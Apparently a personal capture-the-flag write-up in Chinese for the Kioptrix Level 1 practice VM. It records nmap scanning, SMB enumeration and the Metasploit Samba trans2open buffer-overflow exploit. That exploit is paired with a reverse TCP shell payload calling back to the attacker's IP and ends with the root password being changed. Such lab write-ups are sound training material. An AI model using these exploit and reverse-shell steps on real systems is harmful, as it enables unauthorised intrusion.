# Sub. Kioptrix: Level 1 滲透過程(已完成) ## 建立練習靶機的資料夾 mkdir oscp-ctf/mkdir Kioptrix1 cd oscp-ctf/mkdir Kioptrix1 1. 訊息搜集 1.1 掃描網段中活動的主機並存成txt檔 nmap -n -sn -sP 172.20.10.* -oG Kioptrix1_ip.txt 1.2 對目標主機做掃描並存成xml檔 nmap -p- -sV -sS -T4 -A -oX Kioptrix_lv1.xml 172.20.10.4 -p- 掃描全部port號(1-65535) -sV 掃瞄服務程序版本 -sS TCP SYN 掃描 -T4 掃描時序(0-5) 數字越大速度越快 -A 綜合掃描(OS類型 服務版本 默認腳本掃描 traceroute) -oX 輸出的格式為XML 格式 vi Kioptrix_lv1.xml 查看XML檔案 ![](https://i.imgur.com/5beSLuW.jpg) 2. 分析port 利用漏洞 samba是啥:https://noob.tw/samba/ <port protocol="tcp" portid="139"><state state="open" reason="syn-ack" reason_ttl="64"/><service name="netbios-ssn" product="Samba smbd" extrainfo="workgroup: iwMYGROUP" method="probed" conf="10"><cpe>cpe:/a:samba:samba</cpe></service></port> - enum4linux 172.20.10.4 如果smb存在空會話認證就可以利用服務去搜集目標系統的訊息。 結果只得到目標的主機名稱: ![](https://i.imgur.com/GyN1zbk.png) 使用msf: - use auxiliary/scanner/smb/smb_version 用於掃描smb服務版本。 執行後找到服務版本為Samba 2.2.1a ![](https://i.imgur.com/TOKNb5Z.jpg) - back - search samba 返回後開始找samba版本漏洞 - searchsploit samba 2.2.1 a ![](https://i.imgur.com/dupqqjn.png) - 找到linux os相關的第22項 存在緩衝區溢位漏洞 use exploit/linux/samba/trans2open ![](https://i.imgur.com/5zgLmDA.png) show options 上半部為模塊選項 ![](https://i.imgur.com/TfN5v8h.png) 下半部為Payload 選項 LHOST 172.20.10.3 開啟了自己的ip位置 reverse_tcp 反相連接 ![](https://i.imgur.com/Ns532rC.png) - set RHOSTS 172.20.10.4 - exploit 得到的結果是Meterpreter session 死掉了, 因為這邊會用到Meterpreter模組而這個模組版本比較新,靶機的VM 版本比較舊 ![](https://i.imgur.com/glnEAp6.jpg) - 改變payload set payload linux/x86/shell_reverse_tcp 做一個反向SHELL連接 - show options ![](https://i.imgur.com/JC0rSkY.png) - exploit ![](https://i.imgur.com/ul0vYbh.jpg) 這邊發現會話開啟了得到目標主機的地址了 passwd 改密碼 改完後嘗試登入靶機確認可以成功登入root ![](https://i.imgur.com/ZFcAKSw.jpg) ###### tags: `Sub-OSCP`